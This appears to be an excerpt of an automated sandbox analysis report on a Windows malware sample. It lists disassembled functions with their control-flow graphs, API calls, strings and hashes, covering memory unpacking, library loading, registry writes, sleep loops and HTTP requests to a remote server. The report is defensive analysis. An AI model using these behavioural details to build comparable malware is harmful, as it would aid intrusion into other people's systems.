                                                  control_flow_graph 1095 402940-402957 1096 402999-4029ad call 40cd83 1095->1096 1097 402959-402962 1095->1097 1098 402964-402969 1097->1098 1099 4029ae-4029f0 VirtualProtect 1097->1099 1098->1096 1102 40296b-402970 1098->1102 1099->1096 1101 4029f2-402a14 GetLastError FormatMessageA 1099->1101 1104 402a17-402a1c 1101->1104 1105 402972-40297a 1102->1105 1106 402986-402993 call 402c00 1102->1106 1104->1104 1107 402a1e-402a6a LocalAlloc call 4028d0 OutputDebugStringA LocalFree * 2 call 40cd83 1104->1107 1105->1106 1108 40297c-402984 1105->1108 1111 402995 1106->1111 1108->1106 1110 402998 1108->1110 1110->1096 1111->1110
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 004029E8
                                                  • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 004029FD
                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A0B
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A26
                                                  • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A45
                                                  • LocalFree.KERNEL32(00000000), ref: 00402A52
                                                  • LocalFree.KERNEL32(?), ref: 00402A57
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                  • String ID: %s: %s$Error protecting memory page
                                                  • API String ID: 839691724-1484484497
                                                  • Opcode ID: 5db2cce3fd63739b711254987153777c537def3ef7a5a6feb85d6925e6d193cb
                                                  • Instruction ID: e8b4d11ea5ec4951a28bd1c843c991d4af80b6875fe3e076a8189f470f5303fb
                                                  • Opcode Fuzzy Hash: 5db2cce3fd63739b711254987153777c537def3ef7a5a6feb85d6925e6d193cb
                                                  • Instruction Fuzzy Hash: 333103B2B01104AFDB109F68DC44F6EB7A8EF44710F4541BEE905EB2D1DB75AD068B88
                                                  Function 00401840 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298networkfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1200 401840-401903 InternetSetFilePointer InternetReadFile 1202 40193d-401980 call 40ea40 HttpQueryInfoA 1200->1202 1206 401ce5-401d13 call 40cd83 1202->1206 1207 401986-4019b9 CoCreateInstance 1202->1207 1207->1206 1209 4019bf-4019c6 1207->1209 1209->1206 1211 4019cc-4019fa 1209->1211 1212 401a00-401a05 1211->1212 1212->1212 1213 401a07-401ac8 call 402460 MultiByteToWideChar call 40cfd1 MultiByteToWideChar 1212->1213 1218 401ad0-401ad9 1213->1218 1218->1218 1219 401adb-401b99 call 402300 call 40cd91 1218->1219 1226 401bca-401bcc 1219->1226 1227 401b9b-401baa 1219->1227 1228 401bd2-401bd9 1226->1228 1229 401cd9-401ce0 1226->1229 1230 401bc0-401bc7 call 40cfc3 1227->1230 1231 401bac-401bba 1227->1231 1228->1229 1232 401bdf-401c53 call 40cfd1 1228->1232 1229->1206 1230->1226 1231->1230 1233 401d16-401d1b call 411337 1231->1233 1241 401c55-401c63 1232->1241 1242 401cbf-401cd5 call 40cd91 1232->1242 1244 401c65-401c9b call 40cfd1 call 401470 call 40cd91 1241->1244 1245 401c9d 1241->1245 1242->1229 1246 401ca0-401cbc call 401470 1244->1246 1245->1246 1246->1242
                                                  APIs
                                                  • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 004018C5
                                                  • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 004018E4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: FileInternet$PointerRead
                                                  • String ID: text
                                                  • API String ID: 3197321146-999008199
                                                  • Opcode ID: d39032ca1dc0b9f69d1bb390edc8543737ea8d5becb6f7b64ce9485d89a3947a
                                                  • Instruction ID: 48e4c645a74c51e6b7fa04efd3e880018ef5ff171affb454254e0df7a66f96b1
                                                  • Opcode Fuzzy Hash: d39032ca1dc0b9f69d1bb390edc8543737ea8d5becb6f7b64ce9485d89a3947a
                                                  • Instruction Fuzzy Hash: 22C17C70A002189FEB25CF24CD85BEAB7B5FF48304F1041ADE409A72A1DB75AE85CF54
                                                  Function 00414C8F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1451 414c8f-414c9c call 41b919 1454 414cbe-414cca call 414cd1 ExitProcess 1451->1454 1455 414c9e-414cac GetPEB 1451->1455 1455->1454 1456 414cae-414cb8 GetCurrentProcess TerminateProcess 1455->1456 1456->1454
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,00414C8E,00000000,7622DF80,?,00000000,?,004190D3), ref: 00414CB1
                                                  • TerminateProcess.KERNEL32(00000000,?,00414C8E,00000000,7622DF80,?,00000000,?,004190D3), ref: 00414CB8
                                                  • ExitProcess.KERNEL32 ref: 00414CCA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 5d3814fd653fb94eda293752331a35f9eef9a20fec4b4b7a3dbf7aca3d0aeaad
                                                  • Instruction ID: 5ca820ed295d6e044a5f1fab1df988cbd5672b183a1e8dae9fa6470a94bd119c
                                                  • Opcode Fuzzy Hash: 5d3814fd653fb94eda293752331a35f9eef9a20fec4b4b7a3dbf7aca3d0aeaad
                                                  • Instruction Fuzzy Hash: A6E04631102118AFCB216B14CD09AAD3B69EB80791B410429F80486231DF39DDA3DEC8
                                                  Function 00774B01 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1459 774b01-774b1a 1460 774b1c-774b1e 1459->1460 1461 774b25-774b31 CreateToolhelp32Snapshot 1460->1461 1462 774b20 1460->1462 1463 774b33-774b39 1461->1463 1464 774b41-774b4e Module32First 1461->1464 1462->1461 1463->1464 1471 774b3b-774b3f 1463->1471 1465 774b57-774b5f 1464->1465 1466 774b50-774b51 call 7747c0 1464->1466 1469 774b56 1466->1469 1469->1465 1471->1460 1471->1464
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00774B29
                                                  • Module32First.KERNEL32(00000000,00000224), ref: 00774B49
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604082377.000000000076F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0076F000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_76f000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 3833638111-0
                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction ID: 85ca7d497bcee8b21d9e67fa15fbda6fc6d288a5ec82bc9caf14efd52d85f4b3
                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction Fuzzy Hash: A9F09671600710ABDB203BF9A88DB6EB6ECAF49765F104528E64AD24D0DB74EC4546A1
                                                  Function 004063D0 Relevance: 27.4, APIs: 5, Strings: 10, Instructions: 1101sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 129 4063d0-406477 call 414f0a call 414dc4 Sleep call 402460 call 4046d0 138 4064a1-4064e2 call 402460 call 4046d0 129->138 139 406479-406485 129->139 151 406511-406518 138->151 152 4064e4-4064f0 138->152 141 406497-40649e call 40cfc3 139->141 142 406487-406495 139->142 141->138 142->141 144 406502 call 411337 142->144 150 406507-40650e call 40cfc3 144->150 150->151 156 406526-40652c 151->156 157 40651a-406524 151->157 152->150 154 4064f2-406500 152->154 154->144 154->150 158 40652f-406531 156->158 157->158 159 406533-40653b 158->159 160 40655a-406587 call 404450 call 40b430 158->160 161 406540-406558 call 414eda 159->161 168 4068b7-4068fe call 40a830 * 3 call 407310 call 40a460 call 4022c0 call 40a620 call 4021f0 160->168 169 40658d-406626 call 40ea40 call 40cfd1 call 40ea40 160->169 161->160 218 4069d1-4069fc call 4075b0 call 40a420 call 4022c0 call 40a620 call 4021f0 168->218 219 406904-406915 call 402170 168->219 183 406628-40663c call 40d10c 169->183 184 40666a-406671 169->184 183->184 192 40663e-406667 call 40d41e call 40d0c2 183->192 187 406673-406698 184->187 188 40669d-4066be 184->188 187->188 191 4066c0-4066c5 188->191 191->191 194 4066c7-40673f call 402460 call 40b900 191->194 192->184 207 406741-40674d 194->207 208 40676e-406786 194->208 210 406764-40676b call 40cfc3 207->210 211 40674f-40675d 207->211 212 406790-4067ad 208->212 210->208 211->210 214 40675f call 411337 211->214 216 4067c2-4067c9 call 401d20 212->216 217 4067af-4067b8 call 40cd91 212->217 214->210 227 4067ce-4067d0 216->227 217->216 274 406ad0-406afb call 407950 call 40a420 call 4022c0 call 40a620 call 4021f0 218->274 275 406a02-406a79 call 407630 call 40a420 call 4022c0 call 402240 call 4021f0 call 4076b0 call 40a440 call 4022c0 call 402240 call 4021f0 call 407730 call 40a480 call 4022c0 call 40a620 call 4021f0 218->275 233 406974-4069cc call 4074a0 call 40a480 call 4022c0 call 402240 call 4021f0 call 407530 call 40a440 call 4022c0 call 402240 call 4021f0 call 40a800 219->233 234 406917-40696f call 407390 call 40a480 call 4022c0 call 402240 call 4021f0 call 407420 call 40a440 call 4022c0 call 402240 call 4021f0 call 40a800 219->234 231 406865-40686c Sleep 227->231 232 4067d6-4067fc 227->232 231->212 235 406800-406805 232->235 346 406f49-406f4b 233->346 234->346 235->235 239 406807-40682c call 402460 235->239 251 406871-406876 239->251 252 40682e-406831 239->252 261 406878-40687a 251->261 262 40687c-40687e 251->262 256 406833-40683a 252->256 257 40688a-4068b1 call 40a800 call 4021f0 * 2 call 4016d0 252->257 256->231 264 40683c-406845 256->264 257->168 268 406881-406883 261->268 262->268 271 406847-406855 264->271 272 40685b-406862 call 40cfc3 264->272 268->257 269 406885 call 4045e0 268->269 269->257 271->144 271->272 272->231 328 406b01-406b78 call 4079d0 call 40a420 call 4022c0 call 402240 call 4021f0 call 407a50 call 40a440 call 4022c0 call 402240 call 4021f0 call 407ad0 call 40a480 call 4022c0 call 40a620 call 4021f0 274->328 329 406bbf-406bea call 407cf0 call 40a400 call 4022c0 call 40a620 call 4021f0 274->329 422 406a98-406ac3 call 407840 call 40a480 call 4022c0 call 40a620 call 4021f0 275->422 423 406a7b call 4077c0 275->423 498 406b84-406baf call 407be0 call 40a480 call 4022c0 call 40a620 call 4021f0 328->498 499 406b7a-406b7f call 407b60 328->499 377 406bf0-406c8d call 407d70 call 40a460 call 4022c0 call 402240 call 4021f0 call 407df0 call 40a440 call 4022c0 call 402240 call 4021f0 call 407e70 call 40a400 call 4022c0 call 402240 call 4021f0 call 407ef0 call 40a3d0 call 4022c0 call 40a620 call 4021f0 329->377 378 406cd4-406cff call 408110 call 40a3a0 call 4022c0 call 40a620 call 4021f0 329->378 350 406f5a-4070ab call 401670 call 408a70 call 40a480 call 4022c0 call 4089f0 call 40a460 call 4022c0 call 408950 call 40a4e0 call 4022c0 call 40ad00 call 40ad60 call 40ae10 call 40ad60 call 40ae10 call 40ad60 call 4021f0 * 8 346->350 351 406f4d-406f55 call 4021c0 346->351 641 4070b1-4070ca call 4021b0 call 402030 350->641 351->350 631 406c99-406cc4 call 408000 call 40a3d0 call 4022c0 call 40a620 call 4021f0 377->631 632 406c8f-406c94 call 407f80 377->632 436 406d01-406d7a call 4081a0 call 40a440 call 4022c0 call 402240 call 4021f0 call 408220 call 40a480 call 4022c0 call 402240 call 4021f0 call 4082b0 call 40a400 call 4022c0 call 402240 call 4021f0 378->436 437 406d7f-406daa call 408330 call 40a480 call 4022c0 call 40a620 call 4021f0 378->437 422->346 501 406ac9-406ace call 4078d0 422->501 435 406a80-406a93 call 40a460 call 4022c0 423->435 472 406f3b-406f44 call 402240 call 4021f0 435->472 436->346 510 406e2a-406e55 call 408540 call 40a4b0 call 4022c0 call 40a620 call 4021f0 437->510 511 406dac-406e25 call 4083c0 call 40a440 call 4022c0 call 402240 call 4021f0 call 408440 call 40a460 call 4022c0 call 402240 call 4021f0 call 4084c0 call 40a400 call 4022c0 call 402240 call 4021f0 437->511 472->346 498->346 567 406bb5-406bba call 407c70 498->567 499->435 501->435 582 406e57-406ea8 call 4085d0 call 40a440 call 4022c0 call 402240 call 4021f0 call 408650 call 40a400 call 4022c0 call 402240 call 4021f0 call 4086d0 510->582 583 406eaa-406ed5 call 408750 call 40a400 call 4022c0 call 40a620 call 4021f0 510->583 511->346 567->329 705 406f28-406f38 call 40a400 call 4022c0 582->705 583->346 646 406ed7-406f23 call 4087d0 call 40a440 call 4022c0 call 402240 call 4021f0 call 408850 call 40a460 call 4022c0 call 402240 call 4021f0 call 4088d0 583->646 631->346 690 406cca-406ccf call 408090 631->690 632->631 668 40710a-407111 Sleep 641->668 669 4070cc-4070ef call 402070 call 4022c0 call 4025b0 641->669 646->705 668->641 702 4070f1-407100 call 4025b0 669->702 703 407113-40717a call 4021f0 call 40a850 * 3 call 4058d0 669->703 690->378 702->703 712 407102-407105 call 4021f0 702->712 733 407193-4071be call 408b00 call 40a4b0 call 4022c0 call 40a620 call 4021f0 703->733 734 40717c-40718b call 40a850 call 404750 703->734 705->472 712->668 749 407260-407291 call 408c70 call 40a480 call 4022c0 call 40a620 call 4021f0 733->749 750 4071c4-4071f9 call 401670 call 408b90 call 40a350 call 4022c0 733->750 741 407190 734->741 741->733 771 407293-4072f8 call 408de0 call 40a460 call 4022c0 call 408d60 call 40a460 call 4022c0 call 408d00 call 40a330 call 4022c0 call 406270 749->771 772 4072fb-407300 call 4045e0 749->772 768 407200-407216 call 4021b0 call 402030 750->768 781 407227-407244 call 402070 call 4022c0 call 4021f0 768->781 782 407218-407223 Sleep 768->782 771->772 786 407249-40725b call 4021f0 call 4016d0 781->786 782->768 785 407225 782->785 785->786 786->749
                                                  APIs
                                                    • Part of subcall function 00414F0A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0040591F,00000000,5BDF3532), ref: 00414F1D
                                                    • Part of subcall function 00414F0A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414F4E
                                                  • Sleep.KERNELBASE(000003E8,?,7712D120), ref: 00406430
                                                  • __Init_thread_footer.LIBCMT ref: 00406662
                                                  • Sleep.KERNEL32(00000BB8,00000000,?,00438C00,00438ED4,00438ED5,?,?,?,?,?,?,?,00000001,SUB=,00000004), ref: 0040686A
                                                    • Part of subcall function 00407390: __Init_thread_footer.LIBCMT ref: 004073F9
                                                    • Part of subcall function 00407420: __Init_thread_footer.LIBCMT ref: 0040747A
                                                  • Sleep.KERNEL32(00000BB8,00000000,?,?,?,?,?,00433998,00000000,00000000,?,00000000,00000001,SUB=,00000004), ref: 0040710F
                                                  • Sleep.KERNEL32(00000BB8,00000000,00000000,00433998), ref: 0040721D
                                                    • Part of subcall function 00408C70: __Init_thread_footer.LIBCMT ref: 00408CD9
                                                    • Part of subcall function 00408DE0: __Init_thread_footer.LIBCMT ref: 00408E39
                                                    • Part of subcall function 00408D60: __Init_thread_footer.LIBCMT ref: 00408DB9
                                                    • Part of subcall function 00408D00: __Init_thread_footer.LIBCMT ref: 00408D51
                                                    • Part of subcall function 004063D0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004062A3
                                                    • Part of subcall function 004063D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004062C5
                                                    • Part of subcall function 004063D0: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004062ED
                                                    • Part of subcall function 004063D0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004062F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_footer$Sleep$Time$CloseCreateFileOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                                                  • String ID: @BAO$O@K\$SUB=$Y@BA$ZK\.$get$mixone$rmBK$updateSW$>
                                                  • API String ID: 1876388665-2074545787
                                                  • Opcode ID: c9853fe243ca87616cf0691cce8571791723dccf944e3495869a65eaa89bf389
                                                  • Instruction ID: 5f27ce350e39438f477c09faef13317f674b6310b8c83854bcab6de2c29012ff
                                                  • Opcode Fuzzy Hash: c9853fe243ca87616cf0691cce8571791723dccf944e3495869a65eaa89bf389
                                                  • Instruction Fuzzy Hash: 19829571D102049ACB15FBB5D95AAEEB3746F14308F10817FE412771D2EE7C6A48CBAA
                                                  Function 10001523 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 192networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                                  • __cftof.LIBCMT ref: 10001624
                                                  • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                                  • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                                  • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                                  • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                                  • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                                  • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                                  • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                                  • String ID: GET$http://
                                                  • API String ID: 1233269984-1632879366
                                                  • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                  • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                                  • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                  • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0
                                                  Function 00401700 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 103networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401777
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 0040179D
                                                    • Part of subcall function 00402460: Concurrency::cancel_current_task.LIBCPMT ref: 00402593
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017C3
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017E9
                                                  Strings
                                                  • GET, xrefs: 00401F41
                                                  • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004017C7
                                                  • Pazo, xrefs: 00401EBE
                                                  • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017A1
                                                  • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 0040177B
                                                  • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401739
                                                  • text, xrefs: 00401B1C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                  • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$Pazo$text
                                                  • API String ID: 2146599340-339585637
                                                  • Opcode ID: 0e58c970b9ceb9900320a8565722ff61c5d3bffa70bbdad101db58370e9d90cb
                                                  • Instruction ID: dd27eeabaf9dd409a411fe115e39f4e0811eb9476ae1debadf98a18efd4bf4d9
                                                  • Opcode Fuzzy Hash: 0e58c970b9ceb9900320a8565722ff61c5d3bffa70bbdad101db58370e9d90cb
                                                  • Instruction Fuzzy Hash: AF314271D00108AFDB14DFA9CC85FEEBB79EB48714F60C02AE521761D0D778A644CBA5
                                                  Function 0066003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1116 66003c-660047 1117 66004c-660263 call 660a3f call 660e0f call 660d90 VirtualAlloc 1116->1117 1118 660049 1116->1118 1133 660265-660289 call 660a69 1117->1133 1134 66028b-660292 1117->1134 1118->1117 1139 6602ce-6603c2 VirtualProtect call 660cce call 660ce7 1133->1139 1136 6602a1-6602b0 1134->1136 1138 6602b2-6602cc 1136->1138 1136->1139 1138->1136 1145 6603d1-6603e0 1139->1145 1146 6603e2-660437 call 660ce7 1145->1146 1147 660439-6604b8 VirtualFree 1145->1147 1146->1145 1149 6605f4-6605fe 1147->1149 1150 6604be-6604cd 1147->1150 1153 660604-66060d 1149->1153 1154 66077f-660789 1149->1154 1152 6604d3-6604dd 1150->1152 1152->1149 1158 6604e3-660505 LoadLibraryA 1152->1158 1153->1154 1159 660613-660637 1153->1159 1156 6607a6-6607b0 1154->1156 1157 66078b-6607a3 1154->1157 1160 6607b6-6607cb 1156->1160 1161 66086e-6608be LoadLibraryA 1156->1161 1157->1156 1162 660517-660520 1158->1162 1163 660507-660515 1158->1163 1164 66063e-660648 1159->1164 1165 6607d2-6607d5 1160->1165 1168 6608c7-6608f9 1161->1168 1166 660526-660547 1162->1166 1163->1166 1164->1154 1167 66064e-66065a 1164->1167 1169 6607d7-6607e0 1165->1169 1170 660824-660833 1165->1170 1171 66054d-660550 1166->1171 1167->1154 1172 660660-66066a 1167->1172 1175 660902-66091d 1168->1175 1176 6608fb-660901 1168->1176 1177 6607e4-660822 1169->1177 1178 6607e2 1169->1178 1174 660839-66083c 1170->1174 1179 660556-66056b 1171->1179 1180 6605e0-6605ef 1171->1180 1173 66067a-660689 1172->1173 1183 660750-66077a 1173->1183 1184 66068f-6606b2 1173->1184 1174->1161 1185 66083e-660847 1174->1185 1176->1175 1177->1165 1178->1170 1181 66056f-66057a 1179->1181 1182 66056d 1179->1182 1180->1152 1186 66057c-660599 1181->1186 1187 66059b-6605bb 1181->1187 1182->1180 1183->1164 1188 6606b4-6606ed 1184->1188 1189 6606ef-6606fc 1184->1189 1190 66084b-66086c 1185->1190 1191 660849 1185->1191 1199 6605bd-6605db 1186->1199 1187->1199 1188->1189 1193 6606fe-660748 1189->1193 1194 66074b 1189->1194 1190->1174 1191->1161 1193->1194 1194->1173 1199->1171
                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0066024D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID: cess$kernel32.dll
                                                  • API String ID: 4275171209-1230238691
                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction ID: 8728a758dab89e9ea64e30a78b4b1ed508de18543e59f78f2a777fecd39c5750
                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction Fuzzy Hash: 91526874A01229DFDB64CF58C985BA9BBB1BF09304F1480E9E94DAB351DB30AE85DF14
                                                  Function 10001175 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264networkcomfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1256 10001175-100011a6 call 1000e8e7 1259 100011a8-100011bd call 1000270d 1256->1259 1260 100011bf 1256->1260 1262 100011c5-100011dd InternetSetFilePointer 1259->1262 1260->1262 1264 100011e3-1000121b InternetReadFile 1262->1264 1265 10001253-1000125a 1264->1265 1266 1000121d-1000124d call 1000270d call 100050e0 call 10002724 1264->1266 1267 10001260-100012a0 call 10003c40 HttpQueryInfoA 1265->1267 1268 1000125c-1000125e 1265->1268 1266->1265 1274 100012a6-100012d2 CoCreateInstance 1267->1274 1275 1000150a-10001520 call 1000e8a5 1267->1275 1268->1264 1268->1267 1274->1275 1277 100012d8-100012df 1274->1277 1277->1275 1281 100012e5-10001316 call 1000184b call 10001006 1277->1281 1287 10001318 1281->1287 1288 1000131a-10001351 call 10001c08 call 10001bb9 1281->1288 1287->1288 1294 10001357-1000135e 1288->1294 1295 100014fe-10001505 1288->1295 1294->1295 1296 10001364-100013cc call 1000270d 1294->1296 1295->1275 1300 100013d2-100013e8 1296->1300 1301 100014e6-100014f9 call 10002724 1296->1301 1303 10001486-10001497 1300->1303 1304 100013ee-1000141d call 1000270d 1300->1304 1301->1295 1305 10001499-1000149b 1303->1305 1306 100014dc-100014e4 1303->1306 1315 1000146e-10001483 call 10002724 1304->1315 1316 1000141f-10001421 1304->1316 1309 100014aa-100014ac 1305->1309 1310 1000149d-100014a8 call 10005926 1305->1310 1306->1301 1313 100014c0-100014d1 call 10003c40 call 10005926 1309->1313 1314 100014ae-100014be call 100050e0 1309->1314 1326 100014d7 call 1000584c 1310->1326 1313->1326 1314->1306 1315->1303 1317 10001423-10001425 1316->1317 1318 10001434-10001447 call 10003c40 1316->1318 1317->1318 1323 10001427-10001432 call 100050e0 1317->1323 1335 10001456-1000145c 1318->1335 1336 10001449-10001454 call 10005926 1318->1336 1323->1315 1326->1306 1335->1315 1338 1000145e-10001463 call 10005926 1335->1338 1341 10001469 call 1000584c 1336->1341 1338->1341 1341->1315
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                                  • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                                  • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                                  • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                                  • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
